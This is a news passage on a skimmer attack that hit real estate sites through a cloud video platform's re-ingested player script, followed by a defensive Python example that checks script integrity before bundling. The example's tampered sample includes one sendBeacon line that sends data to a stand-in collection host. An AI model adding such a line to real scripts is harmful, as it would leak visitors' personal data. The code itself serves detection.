“With Palo Alto Networks proactive monitoring and detection services, we detected over 100 real estate sites that were compromised by the same skimmer attack,” Palo Alto writes.
The threat actors used this function by providing a script that could be updated upstream, allowing them to inject malicious content after the player was built. “We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player,” Palo Alto Networks notes.
“From the code analysis, we know the skimmer snippet is trying to gather victims’ sensitive information such as names, emails, phone numbers, and send them to a collection server.”
Palo Alto Networks claims that the skimmer is highly polymorphic, mysterious, and ever-changing. A skimmer of this sort might have a huge impact when paired with cloud distribution platforms.
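The re-ingestion path described above can be gated at the platform's build step. The following is an added example, not code from Palo Alto Networks or the affected video platform: it compares a re-fetched upstream script against the last reviewed copy and refuses to bundle it when the digest differs. The function names, sample scripts and hosts are constructed for illustration.

```python
import base64
import hashlib
import re

# Constructed sample: the reviewed upstream script, and the same file after
# extra code was appended at its hosted location.
REVIEWED = (b'var cfg = {cdn: "https://static.example.com/player/"};\n'
            b'function initPlayer(el) { el.dataset.ready = "1"; }\n')
FETCHED = REVIEWED + b'navigator.sendBeacon("https://collect.example.net/c", d);\n'

# Absolute http(s)/ws(s) URLs; group 1 is the host.
_HOST_RE = re.compile(r"(?:https?|wss?)://([A-Za-z0-9.-]+)")


def sri_digest(script: bytes) -> str:
    """SHA-384 digest in Subresource Integrity notation."""
    raw = hashlib.sha384(script).digest()
    return "sha384-" + base64.b64encode(raw).decode("ascii")


def referenced_hosts(script: bytes) -> set:
    """Hosts that appear in plain-text URLs inside the script."""
    text = script.decode("utf-8", errors="replace")
    return {host.lower() for host in _HOST_RE.findall(text)}


def review_before_ingest(reviewed: bytes, fetched: bytes) -> dict:
    """Gate for the player build (hypothetical helper).

    The digest comparison alone decides whether the file may be bundled.
    The host diff is only a triage hint: obfuscated or polymorphic code can
    hide its destinations, so an empty diff never overrides a mismatch.
    """
    pinned, current = sri_digest(reviewed), sri_digest(fetched)
    new_hosts = referenced_hosts(fetched) - referenced_hosts(reviewed)
    return {
        "ingest": pinned == current,
        "pinned": pinned,
        "current": current,
        "new_hosts": sorted(new_hosts),
    }


if __name__ == "__main__":
    for name, blob in (("unchanged", REVIEWED), ("modified", FETCHED)):
        print(name, review_before_ingest(REVIEWED, blob))
```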